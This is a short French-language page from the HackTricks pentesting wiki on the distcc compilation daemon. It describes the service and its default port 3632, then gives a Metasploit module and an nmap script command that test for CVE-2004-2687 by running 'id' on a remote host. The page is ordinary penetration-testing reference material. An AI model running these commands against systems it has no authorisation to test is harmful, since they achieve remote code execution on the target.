hacktricks/network-services-pentesting/3632-pentesting-distcc.md
2023-06-03 13:10:46 +00:00

2.6 KiB

Informations de base

Distcc est conçu pour accélérer la compilation en utilisant la puissance de traitement inutilisée sur d'autres ordinateurs. Une machine avec distcc installé peut envoyer du code à compiler à travers le réseau vers un ordinateur qui a le démon distccd et un compilateur compatible installé.

Port par défaut: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Vérifiez si le système est vulnérable à CVE-2004-2687 pour exécuter du code arbitraire :

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Je ne pense pas que Shodan détecte ce service.

Ressources

Post créé par Álex B (@r1p)

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥